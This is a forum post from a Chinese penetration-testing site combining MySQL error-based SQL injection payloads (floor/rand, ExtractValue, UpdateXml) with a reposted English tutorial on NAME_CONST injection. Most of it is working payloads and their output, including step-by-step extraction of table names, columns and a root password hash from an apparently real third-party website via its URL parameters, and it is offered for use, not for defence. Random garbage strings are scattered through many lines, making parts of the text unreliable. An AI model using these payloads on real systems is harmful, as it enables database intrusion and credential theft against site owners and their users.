中国网络渗透测试联盟
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin 时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:! ?5 a8 g4 ~# }2 c9 B# o# P* z
首先进行正常查询:
mysql> select * from article where id = 1;/ y# N: p. S9 K- }- m' b6 v, k0 |: _
+—-+——-+———+, G$ S+ W2 H j' K& @
| id | title | content |* g G' T) P1 n" G. L
+—-+——-+———+
5 s5 @. {7 K5 {0 j1 z6 b| 1 | test | do it |0 V& g4 r5 c9 ~/ |8 r4 i% S
+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);3 m. [1 z. E: r. ^, D" h1 z
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
* T- F$ z! ]! L/ Z: i4 F! e6 }例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);9 n0 n6 w3 q$ B3 q
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));, E7 F& ^* ]- \. j2 m' t
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
2、ExtractValue
4 v1 I) E" Z; W测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–' T5 r6 \ |1 E. l; F4 X4 \
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
; r7 d9 O: G) b& C! d/ @) J% }0 B1 { P
再收集:
& a# H$ d. `* q' v8 t4 Y& Vhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
7 D3 F8 t" F- [( j2 n( ~$ z
* a, Q) p: z, Z8 x# x. o4 `Error
uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
6 I6 L( [3 C: F' f0 o; c+ `
1 E: M# K3 y& w2 O) f: ohttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)' C+ e4 x2 W; s q* H! _6 u
/ A* m/ A% V- I4 p# e
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
- R0 Y# }- h8 }9 ]* F- h) q4 L, C2 q# F u8 k
MYSQL高版本报错注入技巧-利用NAME_CONST注入
: m/ {) ?5 A8 i5 G: _& wIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 7 A1 `5 M" d7 z/ ^" l f3 l* F
( r( l @# w+ ?: N; Y
: ^% N: o2 F5 d+ I7 B% Q: c# [
相关信息
: {1 C+ ?' j- v$ r7 S7 s
1 d3 R" H0 e9 ~* M/ UNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
% I5 u: z' J8 y2 s( V
# C" W6 z2 P) eCode:# X7 V' U' v2 z, F$ o3 u' b
NAME_CONST(DATA, VALUE)+ X7 X: p9 h8 }2 c/ G
. S5 w8 a" X( y, H5 @5 b
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.8 L6 _6 k: S! j, e$ x6 C
2 \; X$ W7 i9 |. Z6 @' q
SELECT NAME_CONST('TEST', 1)
7 D6 D1 _# d8 I9 ?+ `, B! W* C' h2 v3 q
: `1 z2 }" V m( ]4 l% G4 ?0 N. o+ O: [# O5 P
|---------------|8 }6 X6 Q' O/ d/ N0 V
| TEST |
8 O( `8 G9 A& X$ p/ S( t| |
2 m2 J5 ?% j4 q! x3 r$ _0 ]|---------------|( I. K% K" t9 w% w
| 1 |1 m: ^9 D3 m& j, l. J4 f0 k
| |9 \0 m% h2 H" k7 W8 n/ A
|---------------|
* [# t8 j5 L& Z. v9 T& X1 i ?% ]" X: B$ W
8 R2 n% v! ?0 V" g( c4 I$ q3 M" P$ z4 Y- z/ p! e
- s# ?* u3 ?) l- ^1 n& @http://dev.mysql.com/doc/refman/5.0/en/m...name-const
% H) X$ W" f! D1 y1 r) Y0 Z1 HIntro to MySQL Variables
: M- y) B6 g, y) R1 [8 t0 r" s- W' _8 E
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
. _$ t: D0 ?$ d6 W0 h, x- `# f; X
6 ~! t/ m. q- P+ ~Code:
" U* I; u# f( h6 B* phttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
% A/ e8 j9 k$ W6 ^
3 H" ` Y6 n& Z2 |: O& | X% H' }! j1 W0 s
6 i1 T: o8 R" p8 _* h: Y. @
" x v, `9 O: s, k! r1 ?5 E+ o1 Y
. m Y: y& a3 p8 Q% J* g5 A9 e5 WCode:
8 f* V3 _( Y) ^* Tand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
/ [! T) \7 o% m/ U- d4 Z. P) ]" F u+ D7 F
+ F' n& O' j2 T- f
VAR = Your MySQL variable.
' w2 h! A) k3 n" u& V6 h0 @2 c7 [, F+ @# j4 N3 d! \. W
MySQL 5.1.3 Server System Variables
+ D+ o; [% V' i& n4 ?4 A# R% R; Q7 v/ A C2 b7 r
Let's try it out on my site..
8 Q# D0 `# | Z; x6 _2 r. H+ H3 r' i- R- t; Q. X0 e* O- S
Code:
) o* _; {4 Y- a+ z( F! i0 c& Whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--& y/ m/ c5 h7 N# z8 _2 e" ]
b8 G. u& p' \4 N/ |, }
Erroruplicate column name '5.0.27-community-nt'; F; A3 F2 w: p& G: J9 T
1 y: }! J a; K: E) ^2 x5 ^
$ ]8 N- R/ W+ |/ K/ Y0 V3 D4 i# z/ X2 X f$ b$ q4 F
2 z2 p/ t( Z7 ^% X6 |7 S! c
7 B a$ j$ j4 e% H) m
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
0 x# u* a4 v7 u% ]3 s4 B, f9 a1 _9 A* i- T V
Data Extraction
, p6 x3 |8 l3 P6 L! I) |0 v
3 [+ ], z! L( E0 L. x8 nCode:; O3 I3 V2 y6 w& F; U9 X
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--* x) m- y" a: t* F8 w4 ^% c% }
0 H# I$ ] t3 n
p# l* X1 n$ QWe should get a duplicate column 1 error...
7 o1 s; h' n' i; P
8 O! W* y% a3 C( ^ d' ECode:# l. F; [# f6 h( W' z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
& V6 ^" v2 s1 g1 K- A9 ~/ Q8 P0 P( L" T7 C J
Erroruplicate column name '10 S5 R6 o* p( A8 w; o4 c
( ?/ Z! `! X0 B- g$ S' t% G7 u& ?7 R% B" J& P
3 Y" r8 `6 V6 T# V+ k5 M! O1 a0 P2 b3 ^2 y* u" h3 T; j
! l/ ?, y8 n% T! g. N7 w; d. \7 [
Now let's get the tables out this bitch..
9 O- U2 J/ q8 Y6 x2 @9 ?3 g1 U
* \: H0 F) W. M. QCode:
" b( f: N1 _9 H! q+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--+ Q+ U$ `7 {0 K0 Q: B5 @
. r2 S' N5 H: Z* W
2 s) _; e- X: E# }1 |8 m# c8 M& ^Let's see if it works here, if it does, we can go on and finish the job.
# U9 g E+ d c A" x& K9 j, h- z9 `7 T5 Y
Code:
+ P! {* J% }* L. Lhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--! K2 a* J! z( |1 Z) h
4 k9 A, S9 P3 [+ C5 ?# q& o- C; D) u. B9 g
Erroruplicate column name 'com_admanage
( z7 |9 M: G! C8 C3 n
+ a! M, K& ?8 O$ U: J- A$ j+ p: t( G+ s1 T' Y* _. m$ o
; i# U4 @8 F8 O- j/ P
3 r1 Q$ j- T8 P) v/ x
% n0 J5 u; ^4 }* s
% x* W# V$ ^0 n& O% [Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
2 C" u: P, e( N5 k1 g8 ~
9 W1 u3 O( ]$ ?' LLet's get the columns out of the user table..6 U, q3 | ^9 x9 q4 x" y
$ d' {9 L3 P# P4 o/ Z) h, p
Code:$ k6 w5 c: D9 t
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
- T- x4 j: ?% g J/ v! m" L- [
. J9 F+ h( F7 Z. f( z8 S8 z/ h7 t4 C# ~$ M( H3 k
So mine looks like this, and I get the duplicate column name 'Host'.# O: o; O) J% V5 I
: d, {0 m) Z$ Y! u8 ?) T7 y2 C
Code:
3 o! E$ _% s7 Ihttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
$ B: ^; F, d. z
" j' A( D& ~8 J' V3 lErroruplicate column name 'Host'# P5 J" q* n+ v c9 T6 |
- q- T$ k5 H- t* R( h' ]* l% q' X
V: E1 c2 L% G8 b+ u% P: ~9 j, w( T1 P: l: a
; S6 ]$ W9 M0 F/ w5 ^9 G! h8 P3 I6 D9 f! W2 u
) `, @3 Z) B; q6 Y' r6 q! TWoot, time to finish this bitch off.
6 D% F# Y8 P9 V6 P( Y
. U0 ?- O* W+ @# uCode:: K" g2 Y' ^, t4 Z: R1 L3 z
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--- G( f( ]' l3 h5 H* w& {
1 G2 Z. f! i+ a6 B8 I
. Q T* E1 P% Y+ n6 e# r8 ]" Z
So mine looks like this...; ]/ v! ]0 t1 e& \6 x$ r6 W
. a7 L# c6 V. ^/ ~8 q$ v0 ?Code:" x. J- j" |$ Z: w8 W; s |
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--% l& {* G3 e$ v, E3 D
9 Y% r; R% v$ G# x5 f9 hErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
3 Y( [" q! P& k; |3 k) U6 n% x) w9 Y' p, s* I9 i$ i
" s0 U. }5 e& P+ }6 u
- W* a$ ^2 b6 ~9 }) C) @3 h4 x; j+ x4 {" w
/ f& X; [5 |/ K" P- c4 j0 T/ u
! `2 |, I& m# H! B V, o" J# M
And there we have it, thanks for reading.: g2 B) A: c% L4 q
1 [6 |$ B( o# l5 r) c- \9 [" R5 z
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) |
Powered by Discuz! X3.2 |